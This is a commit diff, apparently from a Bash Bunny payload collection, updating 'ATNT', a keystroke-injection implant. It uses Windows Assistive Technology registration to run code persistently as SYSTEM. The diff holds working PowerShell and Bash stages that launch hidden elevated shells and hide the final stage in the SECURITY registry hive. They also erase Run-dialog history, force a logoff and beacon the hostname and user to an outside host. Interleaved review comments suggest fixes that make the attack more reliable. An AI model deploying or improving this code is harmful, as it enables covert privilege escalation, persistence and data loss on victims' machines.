ATNT update: working version (#461)
* Delete stage3.ps1
* Update ATNT to work as intended. Update ATNT to work as intended. Requires reboot or logoff to fully register AT.
* Remove DONE file in cleanup. Forgot to remove DONE file. Now also makes sure this file does not exist before running.

pull/462/head
parent 4f6cd4b54d
commit 1efd6a1116
@ -0,0 +1,18 @@
# ATNT : Persistent NT AUTHORITY\SYSTEM implant

Uses Windows [Ease of Access Assistive Technology](https://docs.microsoft.com/en-us/windows/win32/winauto/ease-of-access---assistive-technology-registration) to persistently run code with NT AUTHORITY\SYSTEM rights.

## Options
### :warning: FORCE_LOGOFF
> Ease of Access Assistive Technologies (ATs) are only callable after a restart or logoff. Setting this setting to true will forcefully log the user off. Unsaved work on the target may be lost.
### :warning: LOCK_ON_USER
> After the AT has been successfully registered (target machine has rebooted or user has been logged off), the AT will be launched when the user first logs in. The AT is ran as User, and thus can not complete its installation. Setting this setting to true will lock the desktop as soon as the user first logs in. This may cause suspicion for the target user, but only happens once.
### RUN_IMMEDIATELY
> When the AT is first launched as NT AUTHORITY/SYSTEM, the final stage is written to the SECURITY registry hive. Only NT AUTHORITY/SYSTEM has access to this hive. Setting this setting to true will also immediately run the final stage, instead of waiting for a second switch to a Secure Desktop to launch the final stage.

## final_stage.ps1
The final_stage.ps1 file is merged into the second stage. Usage of `@"\n..."@\n` is therefore not possible. Variable definition and usage should be escaped as follows:
```powershell
`$example = 1;
Write-Host `$example;
```
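Review bot: the three option headings say what each switch does but not its default, and payload.txt ships with FORCE_LOGOFF, LOCK_ON_USER and RUN_IMMEDIATELY all set to true, so the forced logoff (with the unsaved-work loss the warning describes) is on unless the operator edits the script; state the default next to each option. The account name is written as both `NT AUTHORITY/SYSTEM` and `NT AUTHORITY\SYSTEM`; the whoami comparisons in stage2.ps1 use the backslash form, so use that throughout. A short removal section listing what the payload writes (the `atnt` key under `HKLM:\...\Accessibility\ATs`, `HKLM:\SECURITY\Policy\PolAtnt`, and the `Configuration` value under `HKCU:\...\Accessibility`) would let anyone cleaning up a test machine undo the registration, since nothing in this commit removes it.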
@ -1 +1,2 @@
iwr ('https://example.com/beacon_'+(whoami))
<#([WmiClass]'Win32_Process').Create('powershell -NoE -NoP whoami');#>
iwr ("example.com/{0}:{1}" -f (hostname),(whoami))
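Review bot: the new `iwr` line drops the `https://` scheme that the removed line had; Windows PowerShell's Invoke-WebRequest treats `example.com/...` as a relative URI and throws instead of sending anything, so put the scheme back. The `<# ... #>` line wrapping a `Win32_Process` call reads like leftover debugging; remove it or comment why it is kept, because everything in this file is merged into the `2` registry value in stage2.ps1. That merge also means the README's backtick-escaping rule for `$` applies to this file.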
@ -1,86 +1,75 @@
#!/bin/bash
#
# Title: ATNT : Persistent NT AUTHORITY\SYSTEM implant
# Description: Uses Windows Ease of Access Assistive Technology (https://docs.microsoft.com/en-us/windows/win32/winauto/ease-of-access---assistive-technology-registration)
# To persistently run code with NT AUTHORITY\SYSTEM rights.
# Author: 9o3
# Twitter: @BugBot4
# Version: 1.0
# Category: Execution
# Attackmodes: HID, Storage
#
# LED STATUS
# ==========
# SETUP.......Generate stage files
# STAGE1......Run hidden elevated PowerShell window that creates the AT
# STAGE2......Trigger the newly created AT
# STAGE3......Update the newly created AT to run the final stage
# STAGE4......(OPTIONAL) Trigger the updated AT to run the final stage
# CLEANUP.....Remove generated files
# FINISH......Finished
#
# OPTIONS
# =======
# Final stage configured from included final_stage.ps1 script
# run_final_stage => Setting this to false will instead trigger the final stage when the user switches to a Secure Desktop
run_final_stage=true

LED SETUP
GET SWITCH_POSITION
cd /root/udisk/payloads/
cd $SWITCH_POSITION
sed "s/!SWITCH!/$SWITCH_POSITION/g" stage2.ps1 > 2
sed '/!FINAL_STAGE!/{
s/!FINAL_STAGE!//g
r final_stage.ps1
}' stage3.ps1 > 3

ATTACKMODE HID STORAGE

######## Run hidden elevated PowerShell window ########
# Runs hidden elevated powershell which executes stage2.ps1
LED STAGE1
QUACK GUI r
QUACK DELAY 500
QUACK STRING "powershell -w 1 -NoP iex(gc((gwmi win32_volume -f 'label=''BashBunny''').Name+'\payloads\\$SWITCH_POSITION\2')-Raw)"
QUACK DELAY 200
QUACK CTRL-SHIFT ENTER
QUACK DELAY 750
QUACK LEFTARROW
QUACK DELAY 100
QUACK ENTER

######## Trigger the newly created AT ########
# ATs are tirggered by a desktop switch. Secure Desktops launch ATs as NT AUTHORITY\SYSTEM
# The AT gets and executes stage3.ps1
LED STAGE2
QUACK DELAY 1000
QUACK CTRL-ALT DEL
QUACK DELAY 750
QUACK ESC

######## Update the newly created AT ########
# Write the content of final_stage.ps1 to the SECURITY hive, which is only readable as NT AUTHORITY\SYSTEM
# Updates the newly created AT to read and execute the final stage from the SECURITY hive
LED STAGE3
until [ -f /root/udisk/DONE ]
do
sleep 0.2
done
if [ "$run_final_stage" = true ] ; then
######## Trigger the updated AT ########
# Trigger the updated AT as NT AUTHORITY\SYSTEM and execute the final stage
LED STAGE4
QUACK CTRL-ALT DEL
QUACK DELAY 750
QUACK ESC
fi

######## Remove generated files ########
# Removes the generated stages and the DONE file used to indicate the end of the third stage
LED CLEANUP
rm /root/udisk/DONE
rm 2
rm 3
sync
LED FINISH
#!/bin/bash
#
# Title: ATNT : Persistent NT AUTHORITY\SYSTEM implant
# Description: Uses Windows Ease of Access Assistive Technology (https://docs.microsoft.com/en-us/windows/win32/winauto/ease-of-access---assistive-technology-registration)
# To persistently run code with NT AUTHORITY\SYSTEM rights.
# Author: 9o3
# Twitter: @BugBot4
# Version: 1.1
# Category: Execution
# Attackmodes: HID, Storage
#
# LED STATUS
# ==========
# SETUP.......Generate stage file
# ATTACK......Run hidden elevated PowerShell window that creates the AT and drops associated code
# CLEANUP.....Remove generated files
# FINISH......Finished
#
# OPTIONS
# =======
# Final stage configured from included final_stage.ps1 script
# FORCE_LOGOFF => Setting this setting to true will forcefully log the user off. Unsaved work on the target may be lost.
# LOCK_ON_USER => Lock the desktop as soon as the user first logs in. This may cause suspicion for the target user, but only happens once. Doing this starts the AT as NT AUTHORITY/SYSTEM.
# RUN_IMMEDIATELY => Run the final stage as soon as the AT is ran as NT AUTHORITY/SYSTEM, instead of running it after it has been called from the SECURITY hive.
FORCE_LOGOFF=true
LOCK_ON_USER=true
RUN_IMMEDIATELY=true

######## Generate stage file ########
# Alter second stage based on settings & merge final stage.ps1 into second stage
LED SETUP
GET SWITCH_POSITION
rm /root/udisk/DONE
cd /root/udisk/payloads/$SWITCH_POSITION
if [ "$RUN_IMMEDIATELY" = true ] ; then
RUN_IMMEDIATELY_TEXT='iex `$p'
fi
if [ "$LOCK_ON_USER" = true ] ; then
LOCK_ON_USER_TEXT='rundll32.exe user32.dll,LockWorkStation;'
fi
if [ "$FORCE_LOGOFF" = true ] ; then
FORCE_LOGOFF_TEXT='(Get-WmiObject -Class Win32_OperatingSystem).Win32Shutdown(4)'
fi

sed -e "s/#RI#/$RUN_IMMEDIATELY_TEXT/g" -e "s/<#LI#>/$LOCK_ON_USER_TEXT/g" -e "s/#FL#/$FORCE_LOGOFF_TEXT/g" -e '/!FINAL_STAGE!/{
s/!FINAL_STAGE!//g
r final_stage.ps1
}' stage2.ps1 > 2

ATTACKMODE HID STORAGE

######## Run hidden elevated PowerShell window ########
# Runs hidden elevated powershell which executes stage2.ps1
LED STAGE1
QUACK GUI r
QUACK DELAY 500
QUACK STRING "powershell -w 1 -NoP iex(gc((gwmi win32_volume -f 'label=''BashBunny''').Name+'\payloads\\$SWITCH_POSITION\2')-Raw)"
QUACK DELAY 200
QUACK CTRL-SHIFT ENTER
QUACK DELAY 1200
QUACK LEFTARROW
QUACK DELAY 200
QUACK ENTER
until [ -f /root/udisk/DONE ]
do
sleep 0.2
done

######## Remove generated files ########
# Removes the generated stage file and sync file system
LED CLEANUP
rm 2
rm /root/udisk/DONE
sync
LED FINISH
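Review bot: the `until [ -f /root/udisk/DONE ]` loop has no timeout, so if the elevated PowerShell never runs (UAC prompt dismissed, volume label not matched, stage2.ps1 failing before its `New-Item ... DONE`) the Bunny sits at LED STAGE1 indefinitely and the generated `2` file is never cleaned up; bound the wait and fall through to CLEANUP when it expires. `rm /root/udisk/DONE` in the setup block prints an error on a first run where the file does not exist; `rm -f` is what "makes sure this file does not exist" should be. The LED STATUS header now lists ATTACK but the script still calls `LED STAGE1`, so one of the two needs updating.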
@ -1,5 +1,5 @@
#Remove latest run entry
$p = "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"; $m = "MRUList"; $l=(gp $p).$m; rp $p $l[0]; sp $p $m $l.Substring(1);
$p = "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"; $m = "MRUList"; $l=gpv $p $m; rp $p $l[0]; sp $p $m $l.Substring(1);

# Create AT to run next stage
$at = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs"
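Review bot: `gpv` is the alias for Get-ItemPropertyValue, which only exists from PowerShell 5.0, whereas the removed `(gp $p).$m` form also works on earlier versions; if older hosts matter keep the old form, otherwise record the requirement in the README. In both forms the line throws when `MRUList` is absent (a profile that has never used the Run dialog), which aborts the script before the AT key is even created, so the rest of the script should not depend on it succeeding. For anyone reviewing a host afterwards: this line deliberately clears the newest RunMRU entry, so an empty or short MRUList is not evidence that the Run dialog was unused.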
@ -8,7 +8,45 @@ New-Item -Path $at -Name "atnt" -Force
New-ItemProperty -Path $atnt -Name "CopySettingsToLockedDesktop" -Value 1 -PropertyType "DWord" -Force
New-ItemProperty -Path $atnt -Name "SimpleProfile" -Value "atnt" -PropertyType "String" -Force
New-ItemProperty -Path $atnt -Name "StartExe" -Value "%SystemRoot%\System32\mshta.exe" -PropertyType "ExpandString" -Force
New-ItemProperty -Path $atnt -Name "StartParams" -Value "vbscript:(CreateObject(""WScript.Shell"").Run(""powershell -w 1 -NoP if((whoami) -ne 'NT AUTHORITY\SYSTEM'){exit};iex(gc((gwmi win32_volume -f 'label=''BashBunny''').Name+'\payloads\!SWITCH!\3')-Raw)"",0)(Window.Close))" -PropertyType "String" -Force
New-ItemProperty -Path $atnt -Name "StartParams" -Value ("vbscript:(CreateObject(""WScript.Shell"").Run(""powershell -w 1 -NoP ([WmiClass]'Win32_Process').Create('powershell -w 1 -NoP iex(gpv HKLM:\SOFTWARE\Microsoft\Windows`` NT\CurrentVersion\Accessibility\ATs\atnt 0)')"",0)(Window.Close))") -PropertyType "String" -Force

# The value of this is ran when the AT is launched.
# If the AT is launched with user privilages, lock the workstation. This trigger the AT to be launched a second time as NT AUTHORITY/SYSTEM.
# When launched as NT AUTHORITY/SYSTEM, the next stage is retrieved from the registry and ran.
New-ItemProperty -Path $atnt -Name "0" -Value @"
if((whoami) -ne 'NT AUTHORITY\SYSTEM'){<#LI#>exit;}
iex(gpv HKLM:\SOFTWARE\Microsoft\Windows`` NT\CurrentVersion\Accessibility\ATs\atnt 1)
"@

# The value of this is ran when the AT is launched with NT AUTHORITY/SYSTEM rights.
# Uses Set-Alias and short variable names to fit payload in a single registry entry.
New-ItemProperty -Path $atnt -Name "1" -Value @"
`$a = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\atnt";
`$p = gpv `$a 2;
sal nip New-ItemProperty;
sal rip Remove-ItemProperty;
ni -Path "HKLM:\SECURITY\Policy" -Name PolAtnt -Force;
nip -Path "HKLM:\SECURITY\Policy\PolAtnt" -Name "1" -Value `$p -PropertyType "string" -Force;
nip -Path `$a -Name "StartParams" -Value "vbscript:(CreateObject(""WScript.Shell"").Run(""powershell -w 1 -NoP if((whoami) -ne 'NT AUTHORITY\SYSTEM'){exit};([WmiClass]'Win32_Process').Create('powershell -w 1 -NoP iex(gpv HKLM:\SECURITY\Policy\PolAtnt 1)')"",0)(Window.Close))" -PropertyType "String" -Force;
rip -Path `$a -Name "2" -Force;
rip -Path `$a -Name "1" -Force;
rip -Path `$a -Name "0" -Force;
#RI#
"@

# The final stage is later written to the SECURITY hive, this hive is only visible by NT AUTHORITY/SYSTEM.
New-ItemProperty -Path $atnt -Name "2" -Value @"
!FINAL_STAGE!

"@


#Add the newly created AT to automatically start on a desktop switch.
New-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Accessibility" -Name "Configuration" -Value "atnt" -PropertyType "String" -Force
New-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Accessibility" -Name "Configuration" -Value "atnt" -PropertyType "String" -Force;

#Let the Bash Bunny know we're done here & Eject.
$bb = (gwmi win32_volume -f 'label=''BashBunny''').Name;
New-Item -ItemType file $bb"DONE";
(New-Object -comObject Shell.Application).Namespace(17).ParseName($bb).InvokeVerb("Eject");

#FL#
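Review bot: the new `StartParams` value at the top of the hunk no longer carries the `if((whoami) -ne 'NT AUTHORITY\SYSTEM'){exit}` guard that both the removed value and the SECURITY-hive `StartParams` written from value `1` have, so every user-level launch of the AT spawns a second powershell through `Win32_Process.Create` only for value `0` to exit it; keeping the guard in front of the `Create` call makes the three values consistent and halves the process creations, which also shows up in anyone's process-creation logging. The comments above value `0` read "privilages" and "This trigger the AT"; tidy them. The `rip` lines delete values 0, 1 and 2 but leave the `atnt` key, `PolAtnt` and the HKCU `Configuration` value in place, which is the point of the persistence but means a test machine needs all three removed by hand afterwards.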
@ -1,14 +0,0 @@
$payload = @"
!FINAL_STAGE!
"@

New-Item -Path "HKLM:\SECURITY\Policy" -Name "PolAtnt" -Force
New-ItemProperty -Path "HKLM:\SECURITY\Policy\PolAtnt" -Name "1" -Value $payload -PropertyType "string" -Force

# The final stage is ran in a new orphaned PowerShell process to prevent it from closing when the Secure Desktop closes.
New-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\atnt" -Name "StartParams" -Value "vbscript:(CreateObject(""WScript.Shell"").Run(""powershell -w 1 -NoP if((whoami) -ne 'NT AUTHORITY\SYSTEM'){exit};([WmiClass]'Win32_Process').Create('powershell -w 1 -NoP iex(gpv HKLM:\SECURITY\Policy\PolAtnt 1)')"",0)(Window.Close))" -PropertyType "String" -Force

#Let the Bash Bunny know we're done here & Eject.
$bb = (gwmi win32_volume -f 'label=''BashBunny''').Name;
New-Item -ItemType file $bb"DONE";
(New-Object -comObject Shell.Application).Namespace(17).ParseName($bb).InvokeVerb("Eject");
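Review bot: the comment "The final stage is ran in a new orphaned PowerShell process to prevent it from closing when the Secure Desktop closes." is the only explanation in the repository of why `StartParams` goes through a nested `Win32_Process.Create`, and it disappears with this file; carry it over to the `StartParams` lines in stage2.ps1 before deleting, so the indirection is not mistaken for redundancy and simplified away in a later change.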